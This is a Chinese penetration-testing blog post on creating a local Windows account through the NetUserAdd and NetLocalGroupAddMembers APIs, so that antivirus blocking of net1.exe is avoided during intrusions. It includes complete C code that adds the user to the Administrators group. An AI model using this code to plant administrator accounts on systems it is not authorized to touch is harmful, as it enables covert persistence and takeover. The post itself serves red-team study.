idiotc4t's blog
搜索文档…
GitBook 提供支持
通过API添加Windows用户

简介

在渗透测试过程中,如果需要白利用远程桌面等服务,往往我们还需要一个知道密码的windows账户,而这个账户通常直接由net1.exe直接添加(当然也可以直接pass the hash登录rdp,略略略),而调用这个可执行文件往往会被第三方杀软直接拦截(略略略,defender是微软自己的,不拦合法功能),这样我们就需要想另外的办法添加用户。

分析过程

    1.
    查文档&google(狗头)
    1.
    调用NetUserAdd添加本地用户
    2.
    调用NetLocalGroupAddMembers将用户添加到组

代码

微软文档解释了这个如何通过这个函数来添加操作系统账户,第一个参数servername指定了需要添加用户的主机名,传入NULL则为本地添加,第二个参数决定了第三个参数传入的结构体,通过这个函数我们可以在windows操作系统上添加账户。
1
NET_API_STATUS NET_API_FUNCTION NetUserAdd(
2
LPCWSTR servername,
3
DWORD level,
4
LPBYTE buf,
5
LPDWORD parm_err
6
);
Copied!
Value
Meaning
1
Specifies information about the user account. The buf parameter points to a USER_INFO_1 structure.
When you specify this level, the call initializes certain attributes to their default values. For more information, see the following Remarks section.
2
Specifies level one information and additional attributes about the user account. The buf parameter points to a USER_INFO_2 structure.
3
Specifies level two information and additional attributes about the user account. This level is valid only on servers. The buf parameter points to a USER_INFO_3 structure. Note that it is recommended that you use USER_INFO_4 instead.
4
Specifies level two information and additional attributes about the user account. This level is valid only on servers. The buf parameter points to a USER_INFO_4 structure.
Windows 2000: This level is not supported.
同理将该账户加入administrators组也是使用类似的函数,这里就不贴参数了。
1
NET_API_STATUS NET_API_FUNCTION NetLocalGroupAddMembers(
2
LPCWSTR servername,
3
LPCWSTR groupname,
4
DWORD level,
5
LPBYTE buf,
6
DWORD totalentries
7
);
Copied!

完整代码

1
#ifndef UNICODE
2
#define UNICODE
3
#endif
4
#pragma comment(lib, "netapi32.lib")
5
6
#include <stdio.h>
7
#include <windows.h>
8
#include <lm.h>
9
10
int wmain(int argc, wchar_t* argv[])
11
{
12
USER_INFO_1 ui;
13
DWORD dwLevel = 1;
14
DWORD dwError = 0;
15
NET_API_STATUS nStatus;
16
17
if (argc != 3)
18
{
19
20
fwprintf(stderr, L"Usage:./this.exe <username> <password>\n", argv[0]);
21
exit(1);
22
}
23
24
ui.usri1_name = argv[1];
25
ui.usri1_password = argv[2];
26
ui.usri1_priv = USER_PRIV_USER;
27
ui.usri1_home_dir = NULL;
28
ui.usri1_comment = NULL;
29
ui.usri1_flags = UF_SCRIPT;
30
ui.usri1_script_path = NULL;
31
32
nStatus = NetUserAdd(NULL,
33
dwLevel,
34
(LPBYTE)&ui,
35
&dwError);
36
37
if (nStatus == NERR_Success)
38
fwprintf(stderr, L"User %s has been successfully added\n",argv[1]);
39
40
else
41
fprintf(stderr, "A system error has occurred: %d\n", nStatus);
42
43
LOCALGROUP_MEMBERS_INFO_3 account;
44
account.lgrmi3_domainandname = argv[1];
45
46
NET_API_STATUS Status = NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
47
48
if (Status == NERR_Success || Status == ERROR_MEMBER_IN_ALIAS){
49
printf("Administrators added Successfully!");
50
}
51
else {
52
printf("Administrators added Failed!");
53
}
54
return 0;
55
}
Copied!

LINKS

NetLocalGroupAddMembers function (lmaccess.h) - Win32 apps
docsmsft
NetUserAdd function (lmaccess.h) - Win32 apps
docsmsft
最近更新 1yr ago